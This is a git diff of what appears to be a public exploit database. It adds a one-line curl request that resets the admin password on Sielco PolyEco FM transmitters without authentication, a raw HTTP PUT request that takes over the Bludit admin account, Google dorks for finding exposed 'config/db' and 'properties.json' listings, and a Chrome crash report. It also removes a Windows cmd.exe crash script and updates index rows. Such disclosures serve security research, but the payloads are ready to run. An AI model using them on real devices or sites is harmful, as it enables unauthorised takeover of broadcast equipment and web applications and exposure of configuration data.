diff --git a/exploits/hardware/webapps/51371.txt b/exploits/hardware/webapps/51371.txt
new file mode 100644
index 000000000..77f443866
--- /dev/null
+++ b/exploits/hardware/webapps/51371.txt
@@ -0,0 +1,54 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
+## Exploit Author: LiquidWorm
+
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: The application suffers from an authentication bypass,
+account takeover/lockout and elevation of privileges vulnerability
+that can be triggered by directly calling the users object and
+effectively modifying the password of the two constants user/role
+(user/admin). This can be exploited by an unauthenticated adversary
+by issuing a single POST request to the vulnerable endpoint and
+gain unauthorized access to the affected device with administrative
+privileges.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5765
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
+
+
+26.01.2023
+
+--
+
+
+# Change admin pwd
+$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
\ No newline at end of file
diff --git a/exploits/macos/local/51361.txt b/exploits/macos/local/51361.txt
new file mode 100644
index 000000000..c30ce70f0
--- /dev/null
+++ b/exploits/macos/local/51361.txt
@@ -0,0 +1,319 @@
+## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
+## Exploit Author: LiquidWorm
+
+Vendor: Google LLC
+Product web page: https://www.google.com
+Affected version: 111.0.5563.64 (Official Build) (x86_64)
+ 110.0.5481.100 (Official Build) (x86_64)
+ 108.0.5359.124 (Official Build) (x86_64)
+ 108.0.5359.98 (Official Build) (x86_64)
+Fixed version: 112.0.5615.49 (Official Build) (x86_64)
+
+Summary: Google Chrome browser is a free web browser used for
+accessing the internet and running web-based applications. The
+Google Chrome browser is based on the open source Chromium web
+browser project. Google released Chrome in 2008 and issues several
+updates a year.
+
+Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
+tabs on macOS.
+
+Commit fix:
+
+"The original cl landed many months ago, but
+chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
+is the only change that didn't revert cleanly."
+
+macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
+
+Implements accessibility hit testing for RemoteCocoa so that Hover Text
+and VoiceOver mouse mode can read the accessible objects under the
+user's pointer. Cross-process plumbing was needed because RemoteCocoa
+bridges to native controls in a separate app shim process and must
+report accessibility trees from the browser process via the
+undocumented NSAccessibilityRemoteUIElement mechanism.
+
+This CL does the following:
+
+1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
+ in the browser process. This enables the browser process to accept
+ redirected accessibilityHitTest calls to the object corresponding to
+ any NSAccessibilityRemoteUIElement returned by the original
+ accessibilityHitTest at the app shim process.
+
+2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
+ accessibilityHitTest to have a custom implementation with
+ NSAccessibilityRemoteUIElement support so that custom window
+ controls can be found. Additionally, adjusts the BrowserView bounds
+ so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
+ support view targeting) can return controls in the web app frame
+ toolbar.
+
+3. (For Web Content) Implements RenderWidgetHostViewCocoa's
+ accessibilityHitTest for instances in the app shim to return a
+ NSAccessibilityRemoteUIElement corresponding to their counterparts
+ in the browser process so that web content objects can be found.
+
+
+Tested on: macOS 12.6.1 (Monterey)
+ macOS 13.3.1 (Ventura)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5770
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
+
+
+08.12.2022
+
+--
+
+
+UI PoC:
+-------
+1. Grab a tab and detach it.
+2. Bring back the tab.
+3. Do this 2-3 times attaching / re-attaching the tab.
+4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
+5. Process crashes entirely.
+
+Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
+Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
+Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
+Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
+
+=============
+//
+// Copyright (c) Microsoft Corporation. All rights reserved.
+//
+
+#include
+
+#include
+#include
+#include
+
+__BEGIN_DECLS
+ // NOLINTNEXTLINE
+ AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
+ // NOLINTNEXTLINE
+ CFTypeID AXTextMarkerGetTypeID();
+__END_DECLS
+
+std::ostream& bold_on(std::ostream& os)
+{
+ if (isatty(STDOUT_FILENO))
+ {
+ return os << "\e[1m";
+ }
+ return os;
+}
+
+std::ostream& bold_off(std::ostream& os)
+{
+ if (isatty(STDOUT_FILENO))
+ {
+ return os << "\e[0m";
+ }
+ return os;
+}
+
+std::string from_cfstr(CFTypeRef cf_ref)
+{
+ if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
+ {
+ const auto cf_str = static_cast(cf_ref);
+ const auto max_length = static_cast(CFStringGetMaximumSizeForEncoding(
+ CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
+
+ auto result = std::string(max_length, '\0');
+ if (CFStringGetCString(cf_str, result.data(), static_cast(max_length), kCFStringEncodingUTF8))
+ {
+ if (const auto pos = result.find('\0'); pos != std::string::npos)
+ {
+ result.resize(pos);
+ }
+ return result;
+ }
+ }
+ return {};
+}
+
+std::string ax_element_id(AXUIElementRef value)
+{
+ // AX element cache - AX elements are backed by CFData
+ // (referring to 'remote' AX objects) and this data is
+ // 'stable' across 'volatile' instances of AXUIElement.
+ // 'hash and equality' of AX elements are based on this
+ // data and therefore, we can use AXUIElement objects as
+ // 'keys' in a dictionary with values, identifying these
+ // objects (uniquely).
+ const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
+ &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
+
+ auto ax_id = CFDictionaryGetValue(ax_elements, value);
+
+ if (ax_id == nullptr)
+ {
+ if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
+ {
+ if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
+ {
+ CFDictionarySetValue(ax_elements, value, uuid_s);
+
+ CFRelease(uuid_s);
+ }
+ CFRelease(uuid);
+ }
+
+ ax_id = CFDictionaryGetValue(ax_elements, value);
+ }
+
+ return from_cfstr(ax_id);
+}
+
+template
+T ax_attribute_value(AXUIElementRef e, CFStringRef name)
+{
+ if (e != nullptr)
+ {
+ auto ref = T{};
+ if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
+ {
+ return ref;
+ }
+ }
+ return nullptr;
+}
+
+// NOLINTNEXTLINE
+void ax_traverse(AXUIElementRef elem, uint32_t depth)
+{
+ const auto max_depth = 10;
+ if (depth > max_depth)
+ {
+ return;
+ }
+
+ const auto indent = [&]()
+ {
+ for (auto x = 0; x < depth; x++)
+ {
+ std::cout << " ";
+ }
+ };
+
+ auto wid = CGWindowID{};
+ if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
+ {
+ wid = 0;
+ }
+
+ indent();
+ const auto role = ax_attribute_value(elem, kAXRoleAttribute);
+
+ std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
+ ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
+ std::endl;
+
+ if (const auto children = ax_attribute_value(elem, kAXChildrenAttribute))
+ {
+ for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
+ {
+ const auto element = static_cast(CFArrayGetValueAtIndex(children, idx));
+ ax_traverse(element, depth + 1);
+ }
+ CFRelease(children);
+ }
+}
+
+int main(int argc, char* const argv[])
+{
+ auto pid = 0;
+
+ if (argc > 1)
+ {
+ if (!AXIsProcessTrusted())
+ {
+ std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
+ exit(1); // NOLINT
+ }
+ // NOLINTNEXTLINE
+ pid = std::stoi(argv[1]);
+ }
+ else
+ {
+ std::cerr << "usage: axtester " << std::endl;
+ exit(1); // NOLINT
+ }
+
+ if (const auto app = AXUIElementCreateApplication(pid))
+ {
+ auto observer = AXObserverRef{};
+ auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
+ {
+ auto myapp = (__AXUIElement*)(ctx);
+ auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
+ std::cout << "Hint: " << hint << std::endl;
+ ax_traverse(myapp, 0);
+ }, &observer);
+
+ if (kAXErrorSuccess != ret)
+ {
+ std::cerr << "Fail to create observer" << std::endl;
+ return -1;
+ }
+
+ std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
+ std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
+ std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
+ std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
+ std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
+ std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
+ std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
+ CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
+ CFRunLoopRun();
+ }
+
+ return 0;
+}
+
+--codeaibot explains--
+
+This is a C++ program that uses the Accessibility API (AX) provided
+by macOS to traverse the user interface of a running application and
+print out information about the accessibility elements that it finds.
+
+The program takes a single argument, which is the process ID (PID) of
+the application to examine. If no argument is provided, the program
+displays a usage message and exits.
+
+The main() function first checks if the Terminal app has been granted
+accessibility privileges by calling the AXIsProcessTrusted() function.
+If it hasn't, the program displays an error message and exits.
+
+If the Terminal app has been granted accessibility privileges, the program
+creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
+function, passing in the PID as an argument.
+
+The ax_traverse() function is then called with the root accessibility
+element of the application as an argument. This function recursively
+traverses the accessibility tree of the application, printing out
+information about each element it encounters.
+
+The program also defines several helper functions for working with Core
+Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
+as well as some functions for printing formatted output to the console
+(bold_on() and bold_off()).
+
+-- / --
+
+As this issue is not a security issue nor results in security consequences,
+this report is not eligible for a VRP reward.
+
+++
+Thank you Amy!
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/51360.txt b/exploits/php/webapps/51360.txt
new file mode 100644
index 000000000..7cedabf2e
--- /dev/null
+++ b/exploits/php/webapps/51360.txt
@@ -0,0 +1,90 @@
+## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
+## Author: nu11secur1ty
+## Date: 04.11.2013
+## Vendor: https://www.bludit.com/
+## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
+## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
+## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
+
+## Description:
+The already authenticated attacker can send a normal request to change
+his password and then he can use
+the same JSON `object` and the vulnerable `API token KEY` in the same
+request to change the admin account password.
+Then he can access the admin account and he can do very malicious stuff.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```PUT
+PUT /api/users/admin HTTP/1.1
+Host: 127.0.0.1:8000
+Content-Length: 138
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-platform: "Windows"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
+Safari/537.36
+content-type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8000
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:8000/admin/edit-user/pwned
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
+Connection: close
+
+{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
+
+```
+
+[+]Response:
+```HTTP
+HTTP/1.1 200 OK
+Host: 127.0.0.1:8000
+Date: Tue, 11 Apr 2023 08:33:51 GMT
+Connection: close
+X-Powered-By: PHP/7.4.30
+Access-Control-Allow-Origin: *
+Content-Type: application/json
+
+{"status":"0","message":"User edited.","data":{"key":"admin"}}
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
+
+## Proof and Exploit:
+[href](https://streamable.com/w3aa4d)
+
+## Time spend:
+00:57:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/windows/dos/51348.txt b/exploits/windows/dos/51348.txt
deleted file mode 100644
index 491938dcd..000000000
--- a/exploits/windows/dos/51348.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
-# Exploit Author: Milad Karimi (Ex3ptionaL)
-# Date: 2023-03-30
-# Vendor Homepage: https://www.microsoft.com/en-us
-# Software Link: https://www.microsoft.com/en-us
-# Tested Version: N/A
-# Tested on OS: Windows 11 Pro
-
-# [ About App ]
-
-Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
-
-An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
-
-This issue affects Microsoft Windows 11 Pro.
-
-Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
-
-
-# [ POC ]
-
-# 1.Run the python script, it will create a new file "PoC.txt"
-# 2.Run Command Prompt
-# 3.Copy the content of the file "PoC.txt"
-# 4.Paste the content of dos.txt into the lin cmd.exe
-# 5.Crashed ;)
-
-#!/usr/bin/env python
-buffer = "A" * 339839907
-payload = buffer
-try:
- f=open("PoC.txt","w")
- print "[+] Creating %s evil payload.." %len(payload)
- f.write(payload)
- f.close()
- print "[+] File created!"
-except:
- print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f788a75a3..3ff01acf6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info
28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info
11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,,
+51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,,
29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info
29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info
30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info
@@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
+51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,,
24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info
38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,,
@@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,,
44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/
48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,,
+51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,,
@@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html
46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,,
+51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,,
44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486
43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html
43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html
@@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
+51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
-51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
diff --git a/ghdb.xml b/ghdb.xml
index b68150a2d..df6ccf7b6 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563
2021-10-18Roshdy Essam
+
+ 8153
+ https://www.exploit-db.com/ghdb/8153
+ Files Containing Juicy Info
+ Google Dork: intitle:"index of" "properties.json"
+ # Google Dork: intitle:"index of" "properties.json"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Arnob Biswas
+
+ intitle:"index of" "properties.json"
+ https://www.google.com/search?q=intitle:"index of" "properties.json"
+
+ 2023-04-14
+ Arnob Biswas
+ 7303
https://www.exploit-db.com/ghdb/7303
@@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info
2022-09-19HackerFrenzy
+
+ 8155
+ https://www.exploit-db.com/ghdb/8155
+ Files Containing Juicy Info
+ intitle:"index of " "config/db"
+ # Google Dork: intitle:"index of" "properties.json"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ intitle:"index of " "config/db"
+ https://www.google.com/search?q=intitle:"index of " "config/db"
+
+ 2023-04-14
+ Jerr279
+ 8132
